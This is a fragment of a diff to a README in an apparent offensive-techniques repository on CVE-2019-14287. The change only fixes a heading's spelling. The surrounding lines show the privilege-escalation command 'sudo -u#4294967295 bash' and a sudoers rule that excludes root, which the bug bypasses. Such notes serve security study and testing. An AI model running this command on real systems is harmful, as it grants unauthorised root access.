offsec-ttps/CVE2019-14287/README.md

 or,
 sudo -u#4294967295 bash
 ```
-## Didn't work, When i used /usr/bin/bash to execute eccept root
+## Didn't work, When I used /usr/bin/bash to execute Accept root

 ```
 lucy    ALL=(ALL, !root)        /usr/bin/id